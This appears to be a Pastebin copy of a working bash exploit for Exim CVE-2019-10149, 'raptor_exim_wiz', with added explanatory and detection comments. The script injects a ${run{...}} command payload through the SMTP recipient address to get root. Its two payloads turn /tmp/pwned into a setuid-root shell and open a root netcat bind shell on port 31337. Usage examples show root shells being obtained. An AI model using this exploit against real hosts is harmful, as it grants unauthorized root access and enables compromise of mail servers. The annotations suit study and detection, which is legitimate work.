
Untitled

a guest
Jun 19th, 2019
  1. #!/bin/bash
  2. #
  3. # raptor_exim_wiz - "The Return of the WIZard" LPE exploit
  4. # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
  5. #
  6. # A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
  7. # Improper validation of recipient address in deliver_message()
  8. # function in /src/deliver.c may lead to remote command execution.
  9. # (CVE-2019-10149)
  10. #
  11. # This is a local privilege escalation exploit for "The Return
  12. # of the WIZard" vulnerability reported by the Qualys Security
  13. # Advisory team.
  14. #
  15. # Credits:
  16. # Qualys Security Advisory team (kudos for your amazing research!)
  17. # Dennis 'dhn' Herrmann (/dev/tcp technique)
  18. #
  19. # Usage (setuid method):
  20. # $ id
  21. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  22. # $ ./raptor_exim_wiz -m setuid
  23. # Preparing setuid shell helper...
  24. # Delivering setuid payload...
  25. # [...]
  26. # Waiting 5 seconds...
  27. # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
  28. # # id
  29. # uid=0(root) gid=0(root) groups=0(root)
  30. #
  31. # Usage (netcat method):
  32. # $ id
  33. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  34. # $ ./raptor_exim_wiz -m netcat
  35. # Delivering netcat payload...
  36. # Waiting 5 seconds...
  37. # localhost [127.0.0.1] 31337 (?) open
  38. # id
  39. # uid=0(root) gid=0(root) groups=0(root)
  40. #
  41. # Vulnerable platforms:
  42. # Exim 4.87 - 4.91
  43. #
  44. # Tested against:
  45. # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
  46. #
  47. METHOD="setuid" # default method
  48. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  49. PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
  50. # usage instructions
#######################################
# Print the command-line synopsis to stdout and exit.
# Globals:   none
# Arguments: none ($0 is the script name)
# Outputs:   usage text on stdout
# Returns:   never returns; exits with status 1
#######################################
function usage()
{
  echo "$0 [-m METHOD]"
  echo "-m setuid : use the setuid payload (default)"
  echo "-m netcat : use the netcat payload"
  exit 1
}
  58. # payload delivery
#######################################
# Hand-roll one SMTP transaction to the local MTA, sending $PAYLOAD as the
# recipient address. Each server reply line is read from fd 3 and echoed.
# Globals:   PAYLOAD (read) — if unset, "rcpt to:<>" is sent
# Arguments: none
# Outputs:   server reply lines on stdout ($REPLY is echoed unquoted, so it
#            is word-split; purely cosmetic here)
# Returns:   status of the last read; note there is no timeout, so a server
#            that never answers leaves each "read -u 3" blocked forever
#######################################
function exploit()
{
  # connect to localhost:25
  # bash's /dev/tcp pseudo-file opens a TCP socket as fd 3 (the "/dev/tcp
  # technique" credited in the header); no nc/telnet binary is needed.
  exec 3<>/dev/tcp/localhost/25
  # deliver the payload
  # greeting banner
  read -u 3 && echo $REPLY
  echo "helo localhost" >&3
  read -u 3 && echo $REPLY
  # empty envelope sender
  echo "mail from:<>" >&3
  read -u 3 && echo $REPLY
  # the recipient address is the injection point (see PAYLOAD_* above)
  echo "rcpt to:<$PAYLOAD>" >&3
  read -u 3 && echo $REPLY
  echo "data" >&3
  read -u 3 && echo $REPLY
  # 31 fake Received: headers in the message body — presumably to exceed
  # Exim's default received_headers_max of 30 so the message is bounced back
  # to the sender, the local delivery path the advisory describes; confirm
  # against the Qualys advisory before relying on this explanation.
  for i in {1..31}
  do
    echo "Received: $i" >&3
  done
  # end of DATA, then close the session
  echo "." >&3
  read -u 3 && echo $REPLY
  echo "quit" >&3
  read -u 3 && echo $REPLY
}
# print banner
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
# parse command line
# Loops until the next positional argument is empty; "-m" consumes the
# following argument as METHOD, anything else prints usage and exits.
while [ ! -z "$1" ]; do
  case $1 in
    -m) shift; METHOD="$1"; shift;;
    * ) usage
    ;;
  esac
done
# "-m" given as the last argument leaves METHOD empty → usage.
# $METHOD is unquoted here, so a value containing spaces also trips this test.
if [ -z $METHOD ]; then
  usage
fi
# setuid method
# Artifacts this branch leaves on disk: /tmp/pwned.c and /tmp/pwned (a
# root-owned binary with mode 4755 once the payload has run). A setuid-root
# file appearing under /tmp is the host-side indicator to alert on.
if [ $METHOD = "setuid" ]; then
 
  # prepare a setuid shell helper to circumvent bash checks
  # (a small C program that sets uid/gid 0 and executes /bin/sh; "bash checks"
  # presumably refers to bash dropping an effective uid that differs from the
  # real uid — not shown here)
  echo "Preparing setuid shell helper..."
  echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
  # compiler diagnostics are discarded; only the exit status is checked
  gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
  if [ $? -ne 0 ]; then
    echo "Problems compiling setuid shell helper, check your gcc."
    echo "Falling back to the /bin/sh method."
    cp /bin/sh /tmp/pwned
  fi
  # select and deliver the payload
  echo "Delivering $METHOD payload..."
  PAYLOAD=$PAYLOAD_SETUID
  exploit
  # wait for the magic to happen and spawn our shell
  # fixed 5-second wait; nothing verifies that the chown/chmod actually ran
  echo "Waiting 5 seconds..."
  sleep 5
  ls -l /tmp/pwned
  /tmp/pwned
# netcat method
# Network indicator for this branch: a listener on TCP 31337 spawned by an
# Exim child, followed by a loopback connection to it.
elif [ $METHOD = "netcat" ]; then
  # select and deliver the payload
  echo "Delivering $METHOD payload..."
  PAYLOAD=$PAYLOAD_NETCAT
  exploit
  # wait for the magic to happen and spawn our shell
  echo "Waiting 5 seconds..."
  sleep 5
  nc -v 127.0.0.1 31337
# print help
# any other METHOD value (e.g. a typo) falls through to usage
else
  usage
fi